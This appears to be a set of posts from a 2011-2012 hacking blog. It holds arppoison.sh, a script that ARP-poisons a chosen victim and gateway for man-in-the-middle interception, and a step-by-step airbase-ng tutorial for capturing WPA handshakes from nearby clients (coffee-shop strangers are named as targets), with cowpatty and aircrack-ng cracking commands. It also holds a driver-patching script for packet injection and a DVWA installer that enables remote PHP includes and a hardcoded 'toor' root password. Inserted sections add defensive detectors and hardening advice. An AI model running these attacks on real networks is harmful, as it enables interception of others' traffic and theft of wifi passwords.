Tuesday, March 27, 2012

arppoison.sh - A script to simplify ARP poisoning for MITM attacks

   Last night I found a script I coded years ago, in 2007 to be exact. I love it when I find old stuff like this, so I thought I would share it here. The script is called arppoison.sh and, as the name suggests, it is used to ARP poison two targets using arpspoof. Since it uses arpspoof you need to have that installed. If you are using BackTrack 5 it should already be there. If you are using Ubuntu you can install it with apt-get as part of the dsniff suite, like so:

sudo apt-get install dsniff
This script is really simple to use:
  1. copy the text below into a text editor like nano or gedit.
  2. save it as arppoison.sh.
  3. run the following command against it: chmod +x arppoison.sh
  4. use the following command to run it: sudo ./arppoison.sh
  5. enter the victim IP
  6. enter the gateway IP (i.e. the router)
  7. sit back as it enables IP forwarding and launches another shell running arpspoof.

   While this script is simple, it is useful because it speeds up launching these attacks: it handles the IP forwarding configuration and launches the attack in a separate shell, saving you from having to start another one and elevate it to root. Pretty much just launch it and keep working. The code for the script is below the screenshot. Don't forget to change the niccard variable to whatever your adapter is called (in my case wlan0). Hope this helps, and feel free to let me know if you have any questions.





==================================================================

#!/bin/bash
# Interface arpspoof will send on; change this to match your adapter.
niccard=wlan0

if [[ $EUID -ne 0 ]]; then
    echo -e "\n\t\t\t\033[1m \033[31m Script must be run as root! \033[0m \n"
    echo -e "\t\t\t Example: sudo $0 \n"
    exit 1
else
    echo -e "\n\033[1;32m#######################################"
    echo -e "#          ARP Poison Script          #"
    echo -e "#######################################"
    echo -e " \033[1;31mCoded By:\033[0m Travis Phillips"
    echo -e " \033[1;31mDate Released:\033[0m 03/27/2012"
    echo -e " \033[1;31mWebsite:\033[0m http://theunl33t.blogspot.com\n\033[0m"
    echo -n "Please enter target's IP: "
    read victimIP
    echo -n "Please enter Gateway's IP: "
    read gatewayIP
    echo -e "\n\t\t ---===[Time to Pwn]===---\n\n\n"
    echo -e "\t\t--==[Targets]==--"
    echo -e "\t\tTarget: $victimIP"
    echo -e "\t\tGateway: $gatewayIP \n\n"
    # Forward the victim's traffic on to the gateway so its connection keeps working.
    echo -e "[*] Enabling IP Forwarding \n"
    echo "1" > /proc/sys/net/ipv4/ip_forward
    # Run arpspoof in its own xterm so this shell stays free.
    echo -e "[*] Starting ARP Poisoning between $victimIP and $gatewayIP! \n"
    xterm -e "arpspoof -i $niccard -t $victimIP $gatewayIP" &
fi

==================================================================
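The defender's view of the same trick, as an added example that is not part of the original post: a small watcher that reads ARP reply lines in the layout of `tcpdump -n -e arp` (the sample lines here are constructed), remembers the last MAC seen for each IP, and alerts when an IP suddenly answers from a different MAC or when one MAC answers for several IPs at once. That second pattern is what arpspoof -t victim gateway looks like to everyone else on the segment. The protected-address list and sample MACs are assumptions.

```python
"""ARP-cache poisoning detector over tcpdump-style ARP reply lines.

Added example, not part of the original post: keeps the last MAC seen for
each IP and alerts on changes, with extra weight for protected addresses
such as the default gateway.
"""
import re
import sys
from collections import defaultdict

# Constructed sample in `tcpdump -n -e arp` layout. The gateway 192.168.1.1
# (MAC ...:01) and a host 192.168.1.50 (...:02) answer normally; then a third
# MAC (...:03) starts answering for both of them, which is exactly what
# `arpspoof -t <victim> <gateway>` produces on the wire.
SAMPLE_LINES = [
    "10:00:01.000100 aa:aa:aa:aa:aa:01 > ff:ff:ff:ff:ff:ff, ethertype ARP (0x0806), "
    "length 42: Reply 192.168.1.1 is-at aa:aa:aa:aa:aa:01, length 28",
    "10:00:02.000200 bb:bb:bb:bb:bb:02 > aa:aa:aa:aa:aa:01, ethertype ARP (0x0806), "
    "length 42: Reply 192.168.1.50 is-at bb:bb:bb:bb:bb:02, length 28",
    "10:00:03.000300 cc:cc:cc:cc:cc:03 > bb:bb:bb:bb:bb:02, ethertype ARP (0x0806), "
    "length 42: Reply 192.168.1.1 is-at cc:cc:cc:cc:cc:03, length 28",
    "10:00:03.000400 cc:cc:cc:cc:cc:03 > aa:aa:aa:aa:aa:01, ethertype ARP (0x0806), "
    "length 42: Reply 192.168.1.50 is-at cc:cc:cc:cc:cc:03, length 28",
]

# Only 'is-at' replies matter: that is the message that rewrites neighbours' caches.
ARP_REPLY = re.compile(
    r"^(?P<ts>\S+)\s.*?Reply (?P<ip>\d{1,3}(?:\.\d{1,3}){3}) is-at "
    r"(?P<mac>(?:[0-9A-Fa-f]{2}:){5}[0-9A-Fa-f]{2})"
)


def parse_reply(line):
    """Return (timestamp, ip, mac) for an ARP reply line, or None for anything else."""
    m = ARP_REPLY.match(line)
    if not m:
        return None
    return m.group("ts"), m.group("ip"), m.group("mac").lower()


class ArpWatch:
    def __init__(self, protected=()):
        self.protected = set(protected)        # IPs whose MAC must never move (gateway)
        self.ip_to_mac = {}                     # last MAC that claimed each IP
        self.mac_to_ips = defaultdict(set)      # every IP each MAC has claimed
        self.alerts = []

    def feed(self, line):
        parsed = parse_reply(line)
        if parsed is None:
            return
        ts, ip, mac = parsed
        previous = self.ip_to_mac.get(ip)
        if previous is not None and previous != mac:
            level = "HIGH" if ip in self.protected else "MEDIUM"
            self.alerts.append(f"{ts} {level} mac-change {ip}: {previous} -> {mac}")
        self.ip_to_mac[ip] = mac
        self.mac_to_ips[mac].add(ip)
        if len(self.mac_to_ips[mac]) > 1:
            # One station answering for several addresses: the poisoner sits in the middle.
            self.alerts.append(f"{ts} MEDIUM multi-ip {mac}: {sorted(self.mac_to_ips[mac])}")


def detect(lines, protected=()):
    """Run all lines through a fresh watcher and return the alerts it raised."""
    watch = ArpWatch(protected)
    for line in lines:
        watch.feed(line)
    return watch.alerts


if __name__ == "__main__":
    # Pipe live data in (tcpdump -l -n -e arp | python3 arpwatch.py) or use the sample.
    source = sys.stdin if not sys.stdin.isatty() else SAMPLE_LINES
    for alert in detect(source, protected={"192.168.1.1"}):
        print(alert)
```

A DHCP lease moving to another machine also changes an IP's MAC, so MEDIUM alerts are a prompt to look rather than proof; the HIGH alert on the gateway is the one worth paging on. On hosts that matter, pin the gateway so a spoofed reply cannot overwrite it: `ip neigh replace 192.168.1.1 lladdr <gateway-mac> dev <iface> nud permanent` (address and interface are placeholders).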

Wednesday, January 18, 2012

Ubuntu 11.10, aireplay-ng, and the "mon0 is on channel -1" error and how to fix it - shell script included

I had recently upgraded my Ubuntu install to 11.10. Along with the other annoyances I came across, I ran into a bit of a deal breaker when I went to run aireplay-ng. I was getting the following error:

mon0 is on channel -1, but the AP uses channel [#]


This was going to be a huge problem, since I knew my ZyDAS 1211 chipset was compatible with packet injection. After searching around for a bit I found a great solution on the site linked in the script below, which explains the drivers and how to patch and reinstall the older ones. Below is a script you can run to get that installed.

Driver Patcher in action.

==================================================================


#!/bin/bash
#
# This fix was found at:
# http://linux-software-news-tutorials.blogspot.com/2011/06/solve-error-mon0-is-on-channel-1-but-ap.html
#
# If this script helps you be sure to drop him a line and
# say thanks!
echo -e "\n\033[1;32m###########################################"
echo -e "# Ubuntu Patched Drivers Installer Script #"

echo -e "# Tested on Ubuntu 11.04 and 11.10 #"
echo -e "###########################################"
echo " Coded By: Travis Phillips"
echo " Date: 01/18/2012"
echo " Website: http://theunl33t.blogspot.com"
echo -e -n "\n[*] Installing build-essential...\033[0m"
sudo apt-get -y install build-essential &> /dev/null
echo -e "\033[1;32mDone!"
echo -e -n "\n[*] Downloading Wireless Drivers...\033[0m"
wget http://wireless.kernel.org/download/compat-wireless-2.6/compat-wireless-2011-06-16.tar.bz2 &> /dev/null
echo -e "\033[1;32mDone!"
echo -e -n "\n[*] Extracting...\033[0m"
tar -jxf compat-wireless-2011-06-16.tar.bz2
cd compat-wireless-2011-06-16
echo -e "\033[1;32mDone!"
echo -e -n "\n[*] Downloading Patches...\033[0m"
wget http://patches.aircrack-ng.org/mac80211.compat08082009.wl_frag+ack_v1.patch &> /dev/null
wget http://patches.aircrack-ng.org/channel-negative-one-maxim.patch &> /dev/null
echo -e "\033[1;32mDone!"
echo -e -n "\n[*] Applying Patches...\033[0m"
patch -p1 < mac80211.compat08082009.wl_frag+ack_v1.patch &> /dev/null
patch ./net/wireless/chan.c channel-negative-one-maxim.patch &> /dev/null
echo -e "\033[1;32mDone!"
echo -e "\n[*] Building patched drivers and installing."
echo -e "\n\t\033[31mTHIS WILL TAKE ABOUT 5-10 mins..."
echo -e "\tPlease be patient and do *NOT* interrupt this process\033[0m\n"
make &> /dev/null
echo -e "\t \033[1;32m[*] Compiling Complete. Installing Drivers...\033[0m\n"
sudo make install &> /dev/null
echo -e "\033[1;32m[*] Installing Patched drivers completed!"
echo -e -n "\n[*] Cleaning Up...\033[0m"
cd ..
rm compat-wireless-2011-06-16.tar.bz2
rm -rf compat-wireless-2011-06-16
echo -e "\033[1;32mDone!"
echo -e "\n\n\t\t[*] \033[1;37mScript Finished! Please reboot to finish the patch.\033[0m\n\n"



==================================================================

To run it, save it to a file called patchwifidrivers.sh and in a terminal type:

chmod +x patchwifidrivers.sh
./patchwifidrivers.sh


Hope this helps some people.

Monday, October 3, 2011

The Many Faces Of God Mode In Windows 7 - With Script

Some of you may already be familiar with "God Mode" in Windows 7. It is a special tool the Windows developer team left in for their own sake, to make enabling and disabling several Windows functions quick and easy. However, there is more than one of these: I have found 39, and I will show you how to access them and also provide a script that does it. It should be noted that these are for Windows 7 and will not work on Windows XP (there are some GUID tricks there too, these just aren't them). The default God Mode is created by adding ".{ED7BA470-8E54-465E-825C-99712043E01C}" to the end of a folder name. So, for example, if you create a folder titled "Main GodMode.{ED7BA470-8E54-465E-825C-99712043E01C}" you get a folder called "Main GodMode" which, when double-clicked, shows you what you see below instead of an empty folder.

God Mode folder View

However, this is just another parlor trick by Windows Explorer. Look at it from the command line and you will see it is still just a folder, but Windows handles it differently.

CMD view of the folder

Looking into the Windows Registry, you can see that the CLSID is actually pointing at a DLL function in the shell32.dll file in the system32 folder.

Registry view of HKEY_CLASSES_ROOT\CLSID\{ED7BA470-8E54-465E-825C-99712043E01C}

With some searching I was able to create a batch file that will create these "modules". The script creates a folder called "GodModes" wherever it is run, then creates 39 known God Mode folders under it for you to use, which gives you a decent "this is what the Control Panel should have been" folder.

View of the GodMode Folder from the script.

Without further delay. Here is the script.
==================================================================
@echo off
rem \\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\
rem \\ This script will create a folder in its          \\
rem \\ current directory called GodModes and then        \\
rem \\ create several "God Mode" folders under it        \\
rem \\ which in Windows Vista/7 will trigger some        \\
rem \\ Control Panel as well as hidden functions         \\
rem \\ found in some of the Windows system DLLs.         \\
rem \\                                                   \\
rem \\ Note: Some of these do NOT work on Vista.         \\
rem \\ For those it will just show a folder.             \\
rem \\ Also one of these only works on Win7 Ultimate,    \\
rem \\ which is the BitLocker module.                    \\
rem \\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\
echo.
echo ***********************************************
echo Enable Windows 7 God Mode Modules v1.0
echo ***********************************************
echo Coded By: Travis Phillips
echo Coded on: 10/03/2011
echo.
echo [*] Creating folder .\GodModes
mkdir "GodModes"
echo.
echo [*] Changing to .\GodModes
cd GodModes
echo.
echo [*] Creating GodMode "Default Geolocation"...
mkdir "Default Geolocation.{00C6D95F-329C-409a-81D7-C46C66EA7F33}"
echo.
echo [*] Creating GodMode "Biometrics"...
mkdir "Biometrics.{0142e4d0-fb7a-11dc-ba4a-000ffe7ab428}"
echo.
echo [*] Creating GodMode "Power Plan"...
mkdir "Power Plan.{025A5937-A6BE-4686-A844-36FE4BEC8B6D}"
echo.
echo [*] Creating GodMode "Personalization Control Panel"...
mkdir "Personalization Control Panel.{ED834ED6-4B5A-4bfe-8F11-A626DCB6A921}"
echo.
echo [*] Creating GodMode "Taskbar Notification Area"...
mkdir "Taskbar Notification Area.{05d7b0f4-2121-4eff-bf6b-ed3f69b894d9}"
echo.
echo [*] Creating GodMode "Administration Tools"...
mkdir "Administration Tools.{D20EA4E1-3957-11d2-A40B-0C5020524153}"
echo.
echo [*] Creating GodMode " Windows Vault (Credential Manager - Auto Logon)"...
mkdir "Windows Vault (auto logon).{1206F5F1-0569-412C-8FEC-3204630DFB70}"
echo.
echo [*] Creating GodMode "Ease of Access"...
mkdir "Ease of Access.{D555645E-D4F8-4c29-A827-D93C859C4F2A}"
echo.
echo [*] Creating GodMode "Install Program from the Network"...
mkdir "Install Program from the Network.{15eae92e-f17a-4431-9f28-805e482dafd4}"
echo.
echo [*] Creating GodMode "Network Map"...
mkdir "Network Map.{E7DE9B1A-7533-4556-9484-B26FB486475E}"
echo.
echo [*] Creating GodMode "Default Programs"...
mkdir "Default Programs.{17cd9488-1228-4b2f-88ce-4298e93e0966}"
echo.
echo [*] Creating GodMode "Windows SideShow"...
mkdir "Windows SideShow.{E95A4861-D57A-4be1-AD0F-35267E261739}"
echo.
echo [*] Creating GodMode "DOT NET Framework Modules"...
mkdir "DOT NET Framework Modules.{1D2680C9-0E2A-469d-B787-065558BC7D43}"
echo.
echo [*] Creating GodMode "GPS Sensors"...
mkdir "GPS Sensors.{E9950154-C418-419e-A90A-20C5287AE24B}"
echo.
echo [*] Creating GodMode "Manage Wireless Networks"...
mkdir "Manage Wireless Networks.{1FA9085F-25A2-489B-85D4-86326EEDCD87}"
echo.
echo [*] Creating GodMode "Network"...
mkdir "Network.{208D2C60-3AEA-1069-A2D7-08002B30309D}"
echo.
echo [*] Creating GodMode "My Computer"...
mkdir "My Computer.{20D04FE0-3AEA-1069-A2D8-08002B30309D}"
echo.
echo [*] Creating GodMode "Computers and Devices"...
mkdir "Computers and Devices.{F02C1A0D-BE21-4350-88B0-7367FC96EF3C}"
echo.
echo [*] Creating GodMode "Manage Printers"...
mkdir "Manage Printers.{2227A280-3AEA-1069-A2DE-08002B30309D}"
echo.
echo [*] Creating GodMode "Recent Places"...
mkdir "Recent Places.{22877a6d-37a1-461a-91b0-dbda5aaebc99}"
echo.
echo [*] Creating GodMode "Bluetooth Devices"...
mkdir "Bluetooth Devices.{28803F59-3A75-4058-995F-4EE5503B023C}"
echo.
echo [*] Creating GodMode "Workspaces Center (Remote Connections)"...
mkdir "Workspaces Center (Remote Connections).{241D7C96-F8BF-4F85-B01F-E2B043341A4B}"
echo.
echo [*] Creating GodMode "Windows Firewall"...
mkdir "Windows Firewall.{4026492F-2F69-46B8-B9BF-5654FC07E423}"
echo.
echo [*] Creating GodMode "Favorites"...
mkdir "Favorites.{323CA680-C24D-4099-B94D-446DD2D7249E}"
echo.
echo [*] Creating GodMode "Windows Update"...
mkdir "Windows Update.{36eef7db-88ad-4e81-ad49-0e313f0c35f8}"
echo.
echo [*] Creating GodMode "Rate and Improve Computer Performance"...
mkdir "Rate and Improve Computer Performance.{78F3955E-3B90-4184-BD14-5397C15F1EFC}"
echo.
echo [*] Creating GodMode "Main Godmode"...
mkdir "Main Godmode.{ED7BA470-8E54-465E-825C-99712043E01C}"
echo.
echo [*] Creating GodMode "Speech Recognition"...
mkdir "Speech Recognition.{58E3C745-D971-4081-9034-86E34B30836A}"
echo.
echo [*] Creating GodMode "User Accounts"...
mkdir "User Accounts.{60632754-c523-4b62-b45c-4172da012619}"
echo.
echo [*] Creating GodMode "Action Center"...
mkdir "Action Center.{BB64F8A7-BEE7-4E1A-AB8D-7D8273F7FDB6}"
echo.
echo [*] Creating GodMode "Backup and Restore"...
mkdir "Backup and Restore.{B98A2BEA-7D42-4558-8BD1-832F41BAC6FD}"
echo.
echo [*] Creating GodMode "Display"...
mkdir "Display.{C555438B-3C23-4769-A71F-B6D3D9B6053A}"
echo.
echo [*] Creating GodMode "Recovery"...
mkdir "Recovery.{9FE63AFD-59CF-4419-9775-ABCC3849F861}"
echo.
echo [*] Creating GodMode "AutoPlay"...
mkdir "AutoPlay.{9C60DE1E-E5FC-40f4-A487-460851A8D915}"
echo.
echo [*] Creating GodMode "BitLocker Drive Encryption (Ultimate edition only)"...
mkdir "BitLocker Drive Encryption (Ultimate edition only).{D9EF8727-CAC2-4e60-809E-86F80A666C91}"
echo.
echo [*] Creating GodMode "Font Settings"...
mkdir "Font Settings.{93412589-74D4-4E4E-AD0E-E0CB621440FD}"
echo.
echo [*] Creating GodMode "Parental Controls"...
mkdir "Parental Controls.{96AE8D84-A250-4520-95A5-A47A7E3C548B}"
echo.
echo [*] Creating GodMode "Sync Center"...
mkdir "Sync Center.{9C73F5E5-7AE7-4E32-A8E8-8D23B85255BF}"
echo.
echo [*] Creating GodMode "System Information"...
mkdir "System Information.{BB06C0E4-D293-4f75-8A90-CB05B6477EEE}"
echo.
echo [*] Changing back to .\
cd ..
==================================================================

Friday, September 2, 2011

No Access Point? No Problem!: How to get a WPA/WPA2 4-way handshake using Airbase-ng

Today we are going to look at how to get a WPA/WPA2 4-way handshake from a client using Airbase-ng, without the client being connected to or anywhere near its real access point. This is useful because a lot of machines send out probe requests for access points they have connected to before (you will see them while running airodump-ng, at the bottom right). That means the machine is looking for that access point and wants to connect to it. What we will do with Airbase-ng is pretend to be that access point and let the client attempt to connect to us.

So for this tutorial I will be using:
- One Attacker Box running BackTrack 5
- One laptop running XP or 7 pre-configured to connect to a SSID of linksys with a WPA2 key set

Step 1: Going in to Monitor Mode

With that said, let's first get things set up on the attacking machine by putting the wireless card into monitor mode with airmon-ng. Since my wireless interface is "wlan0", I would use the command "airmon-ng start wlan0". This gives us a virtual interface called "mon0" which is in monitor mode.

Airmon-ng setting wlan0 to monitor mode.

Step 2a: Setting up the fake AP (Single Known Target Method)

Use this method if you know the target AP's ESSID or you only want to attack that one; otherwise use Step 2b instead, but still read this section first to get a better understanding. Next, let's take a moment to look at the help options for airbase-ng, pictured below.

Airbase-ng Help

So now let's set up our options. For this attack I'm going to use the following command. (Note: the switches are case sensitive, so pay close attention.)

airbase-ng -F ./Desktop/WPA-attack.cap --essid linksys -Z 2 -c 1 -i mon0 mon0


I owe you a little explanation of what the command does. Here's a quick breakdown, as per the help screen.

usage: airbase-ng <options> <replay interface>
  • -F prefix : write all sent and received frames into pcap file
  • --essid <ESSID> : specify a single ESSID (short -e)
  • -Z type : same as -z, but for WPA2. 1=WEP40 2=TKIP 3=WRAP 4=CCMP 5=WEP104
  • -c channel : sets the channel the fake AP is going to run on
  • -i iface : capture packets from this interface
So, basically, this command sets up mon0 to listen and answer (-i mon0 mon0) as a WPA2-TKIP access point (-Z 2) running on channel 1 (-c 1) with the SSID linksys (--essid linksys), and logs all packets to a capture file on the desktop (-F ./Desktop/WPA-attack.cap).

Airbase-ng in Action

Above is a console picture of it in action. As you can see in the last 3 lines, the machine is attempting to authenticate to our fake AP. Once you see that line, it is safe to open another terminal and open the pcap file (in my case ./Desktop/WPA-attack.cap-01.cap) with aircrack-ng to confirm you got a handshake.

Aircrack-ng shows we have the handshake!

So on this note, we see we got a handshake!

Step 2b: Setting up the fake AP (Unknown Target Method)

Warning: this method will attempt to attack every probe it sees! If you don't know the ESSID the client is probing for, or just want to go after everyone in the area (airport or coffee shop, anyone?), use this form of the command.

airbase-ng -P -C 500 -Z 2 -c 1 -i mon0 -F ./Desktop/Probe_hits mon0

It's pretty much the same as the one from Step 2a, except that instead of "--essid linksys" we use "-P -C 500" (case sensitive, so note these are uppercase switches).

usage: airbase-ng <options> <replay interface>
  • -F prefix : write all sent and received frames into pcap file
  • -P : respond to all probes, even when specifying ESSIDs
  • -C seconds : enables beaconing of probed ESSID values (requires -P)
  • -Z type : same as -z, but for WPA2. 1=WEP40 2=TKIP 3=WRAP 4=CCMP 5=WEP104
  • -c channel : sets the channel the AP is running on
  • -i iface : capture packets from this interface

Airbase-ng Responding to all beacons.

For this approach I changed the victim's wireless connection settings from linksys to "testing". As you can see, airbase-ng picked up the probe, repeated it as a beacon, and allowed the client to connect, which gets us the handshake the same as above.
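What the two airbase-ng modes above look like from the other side, as an added example that is not part of the original post: a check that reads an access-point survey in the column order of an airodump-ng CSV export (the survey text here is constructed and the column layout is an assumption, so adjust the indexes if your version differs) and compares it with an inventory of the BSSIDs and cipher your own ESSIDs are supposed to use. It flags the three symptoms the tutorial produces: a known ESSID beaconed from an unknown BSSID, a weaker cipher than the real network runs (-Z 2 is TKIP), and one BSSID beaconing many ESSIDs (the -P -C "answer every probe" mode). The inventory values are assumptions.

```python
"""Rogue / evil-twin access point check over an airodump-ng style CSV.

Added example, not part of the original post. Everything below the header
row is constructed sample data.
"""
import csv
from collections import defaultdict

# The networks you own (assumed values): allowed BSSIDs and the cipher they run.
INVENTORY = {
    "linksys": {"bssids": {"00:14:bf:11:22:33"}, "cipher": "CCMP"},
}

# Constructed survey. Row 1 is the real AP; rows 2-4 are one unknown BSSID on
# channel 1 beaconing linksys (with TKIP) plus every other ESSID it heard probed.
SAMPLE_CSV = """\
BSSID, First time seen, Last time seen, channel, Speed, Privacy, Cipher, Authentication, Power, # beacons, # IV, LAN IP, ID-length, ESSID, Key
00:14:BF:11:22:33, 2011-09-02 10:00:00, 2011-09-02 10:05:00, 6, 54, WPA2, CCMP, PSK, -40, 120, 0, 0.0.0.0, 7, linksys,
00:C0:CA:AA:BB:CC, 2011-09-02 10:01:00, 2011-09-02 10:05:00, 1, 54, WPA2, TKIP, PSK, -30, 60, 0, 0.0.0.0, 7, linksys,
00:C0:CA:AA:BB:CC, 2011-09-02 10:01:30, 2011-09-02 10:05:00, 1, 54, WPA2, TKIP, PSK, -30, 55, 0, 0.0.0.0, 7, testing,
00:C0:CA:AA:BB:CC, 2011-09-02 10:02:00, 2011-09-02 10:05:00, 1, 54, WPA2, TKIP, PSK, -30, 50, 0, 0.0.0.0, 10, CoffeeShop,
"""

# Column indexes in the airodump-ng AP table (assumed layout, see lead-in).
COL_BSSID, COL_CHANNEL, COL_PRIVACY, COL_CIPHER, COL_ESSID = 0, 3, 5, 6, 13


def parse_survey(text):
    """Return (bssid, channel, privacy, cipher, essid) tuples, skipping header and blank rows."""
    rows = []
    for row in csv.reader(text.splitlines()):
        cells = [c.strip() for c in row]
        if len(cells) <= COL_ESSID or cells[COL_BSSID].upper() == "BSSID":
            continue
        rows.append((cells[COL_BSSID].lower(), cells[COL_CHANNEL],
                     cells[COL_PRIVACY], cells[COL_CIPHER], cells[COL_ESSID]))
    return rows


def audit(text, inventory=INVENTORY):
    """Compare a survey with the inventory; return a list of (alert_type, detail)."""
    alerts = []
    essids_per_bssid = defaultdict(set)
    for bssid, channel, privacy, cipher, essid in parse_survey(text):
        essids_per_bssid[bssid].add(essid)
        expected = inventory.get(essid)
        if expected is None:
            continue  # not one of ours, nothing to compare against
        if bssid not in expected["bssids"]:
            alerts.append(("EVIL_TWIN",
                           f"{essid} beaconed by unknown BSSID {bssid} on channel {channel}"))
        if cipher.upper() != expected["cipher"]:
            alerts.append(("CIPHER_MISMATCH",
                           f"{essid} from {bssid} offers {privacy}/{cipher}, expected {expected['cipher']}"))
    # A single radio beaconing many networks is the -P -C probe-mirroring mode.
    for bssid, essids in essids_per_bssid.items():
        if len(essids) > 1:
            alerts.append(("MULTI_ESSID", f"{bssid} beacons {len(essids)} ESSIDs: {sorted(essids)}"))
    return alerts


if __name__ == "__main__":
    for kind, detail in audit(SAMPLE_CSV):
        print(f"{kind:16} {detail}")
```

The client-side lesson is the same one the tutorial relies on: a station that keeps a saved profile for "linksys" will join any AP that beacons that name with a matching security type. Removing stale profiles, disabling auto-connect for open and PSK networks you no longer use, and moving managed fleets to 802.1X (where the client validates the server certificate before the 4-way handshake ever starts) are what take the probe-and-answer trick away.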

Step 3a: Cracking it with Cowpatty and rainbow tables

This is my preferred method of cracking WPA/WPA2. However, Cowpatty (even the install on BackTrack) will by default not detect the 4-way handshake obtained with these methods unless you patch it. You can patch it by following a step-by-step article I wrote, or with a script I coded for that, both of which can be found here. With Cowpatty patched, just use the following command:

Command to crack using Cowpatty.

cowpatty -r ./Desktop/WPA-attack.cap-01.cap -s linksys -d linksysHashTable

In this command, -r points cowpatty to the capture file with the handshake, -s gives it the ESSID, and -d points to my rainbow table for this SSID. If you need rainbow tables for Cowpatty, I recommend you check out the Church of WiFi set from Renderlab's web page: a free set of 33GB of tables built from the top 1,000 SSIDs seen on WiGLE (Wireless Geographic Logging Engine), a community site where wardrivers upload their GPS wardriving data to be mapped for all to see.



If that image isn't encouragement to get your rainbow tables, I don't know what is. Cracked after 395,442 tries in about 2.5 seconds!!! So worth the download and the space to keep these handy. If the SSID is one not in the kit, you can make your own table by following this post here.

Step 3b: Cracking it with aircrack-ng using a Dictionary

In this attack we will use aircrack-ng with the default dictionary that comes with BackTrack (located at /pentest/password/wordlist/darkc0de.lst). This is just to show you a second method and give you something to compare the time difference of rainbow table vs. dictionary attacks. To run it, just do the following:

aircrack-ng ./Desktop/WPA-attack.cap-01.cap -w /pentest/password/wordlist/darkc0de.lst

Aircrack-ng target selection
On mine it was number two but just hit the number next to the network with the handshake you are attacking. You should see it start to run the attack.

Aircrack-ng Finished Cracking
As you can see this worked too, but it took 16 minutes instead of 2 seconds. Whichever method is easier for you, that's the one to use. Hope this helps some people; if you have any questions, feel free to leave them in the comments area.
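Why the Cowpatty tables in Step 3a are built per SSID, and why the dictionary run in Step 3b is so much slower, comes down to one derivation. As an added example that is not part of the original post, the standard PMK computation from IEEE 802.11i is carried through below: the passphrase is never used directly, the SSID acts as the salt, and 4096 PBKDF2 rounds are paid for every candidate. The candidate list is constructed; the first check uses the "password"/"IEEE" test vector published with the standard.

```python
"""WPA/WPA2 Pairwise Master Key derivation, and why precomputed tables are per-SSID.

Added example, not part of the original post. Follows IEEE 802.11i:
PMK = PBKDF2-HMAC-SHA1(passphrase, ssid, iterations=4096, dkLen=32).
"""
import hashlib


def wpa_pmk(passphrase: str, ssid: str) -> bytes:
    """Derive the 256-bit PMK (the 'PSK') from a passphrase and the network's SSID."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode("utf-8"),
                               ssid.encode("utf-8"), 4096, 32)


def build_table(ssid: str, candidates):
    """Precompute PMK -> passphrase for ONE ssid; this is what a per-SSID hash table stores."""
    return {wpa_pmk(p, ssid): p for p in candidates}


def lookup(table, pmk: bytes):
    """Table hit is a dictionary lookup, no PBKDF2 work at all."""
    return table.get(pmk)


if __name__ == "__main__":
    # Published test vector from the 802.11i specification.
    print(wpa_pmk("password", "IEEE").hex())

    # Constructed candidate list: the table for one SSID is useless for any other SSID,
    # even with the same passphrase, because the SSID is the salt.
    table = build_table("linksys", ["password", "letmein", "trustno1"])
    print(lookup(table, wpa_pmk("password", "linksys")))        # found instantly
    print(lookup(table, wpa_pmk("password", "MyUniqueSSID")))   # None: different salt
```

The defensive reading: a unique SSID means no published table applies and every guess costs the attacker 4096 HMAC-SHA1 rounds, and a long random passphrase puts the number of guesses out of reach regardless of tables. Note that the salt only stops precomputation; it does nothing for a weak passphrase on a common SSID, which is exactly the case the Church of WiFi tables cover.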

Enjoy and stay out of trouble! ;-)

Tuesday, August 23, 2011

installDVWA.sh - Script to Download, Configure, and launch Damn Vulnerable Web App on Backtrack 5

So I recently needed to automate this process, as it had to be done on over 30 machines, and I'm lazy: if I have to do something more than once, it gets automated. This script downloads DVWA (Damn Vulnerable Web App), unzips it, copies it into your web root, configures it, starts apache and mysql, and sets up the mysql database with the DVWA data, all in about 30-45 seconds.

So first a screenshot of it:

ScreenShot of installDVWA.sh

And of course, you'll probably want the code so here it is. ;-)
==================================================================
#!/bin/bash
echo -e "\n#######################################"
echo -e "# Damn Vulnerable Web App Installer Script #"
echo -e "#######################################"
echo " Coded By: Travis Phillips"
echo " Website: http://theunl33t.blogspot.com"
echo -e -n "\n[*] Changing directory to /var/www..."
cd /var/www > /dev/null
echo -e "Done!\n"

echo -n "[*] Removing default index.html..."
rm index.html > /dev/null
echo -e "Done!\n"

echo -n "[*] Changing to Temp Directory..."
cd /tmp
echo -e "Done!\n"

echo "[*] Downloading DVWA..."
wget http://voxel.dl.sourceforge.net/project/dvwa/DVWA-1.0.7.zip
echo -e "Done!\n"

echo -n "[*] Unzipping DVWA..."
unzip DVWA-1.0.7.zip > /dev/null
echo -e "Done!\n"

echo -n "[*] Deleting the zip file..."
rm DVWA-1.0.7.zip > /dev/null
echo -e "Done!\n"

echo -n "[*] Copying dvwa to root of Web Directory..."
cp -R dvwa/* /var/www > /dev/null
echo -e "Done!\n"

echo -n "[*] Clearing Temp Directory..."
rm -R dvwa > /dev/null
echo -e "Done!\n"

echo -n "[*] Enabling Remote include in php.ini..."
cp /etc/php5/apache2/php.ini /etc/php5/apache2/php.ini1
sed -e 's/allow_url_include = Off/allow_url_include = On/' /etc/php5/apache2/php.ini1 > /etc/php5/apache2/php.ini
rm /etc/php5/apache2/php.ini1
echo -e "Done!\n"

echo -n "[*] Enabling write permissions to /var/www/hackable/uploads..."
chmod 777 /var/www/hackable/uploads/
echo -e "Done!\n"

echo -n "[*] Starting Web Service..."
service apache2 start &> /dev/null
echo -e "Done!\n"

echo -n "[*] Starting MySQL..."
service mysql start &> /dev/null
echo -e "Done!\n"

echo -n "[*] Updating Config File..."
cp /var/www/config/config.inc.php /var/www/config/config.inc.php1
sed -e 's/'\'\''/'\''toor'\''/' /var/www/config/config.inc.php1 > /var/www/config/config.inc.php
rm /var/www/config/config.inc.php1
echo -e "Done!\n"

echo -n "[*] Updating Database..."
wget --post-data "create_db=Create / Reset Database" http://127.0.0.1/setup.php &> /dev/null
mysql -u root --password='toor' -e 'update dvwa.users set avatar = "/hackable/users/gordonb.jpg" where user = "gordonb";'
mysql -u root --password='toor' -e 'update dvwa.users set avatar = "/hackable/users/smithy.jpg" where user = "smithy";'
mysql -u root --password='toor' -e 'update dvwa.users set avatar = "/hackable/users/admin.jpg" where user = "admin";'
mysql -u root --password='toor' -e 'update dvwa.users set avatar = "/hackable/users/pablo.jpg" where user = "pablo";'
mysql -u root --password='toor' -e 'update dvwa.users set avatar = "/hackable/users/1337.jpg" where user = "1337";'
echo -e "Done!\n"

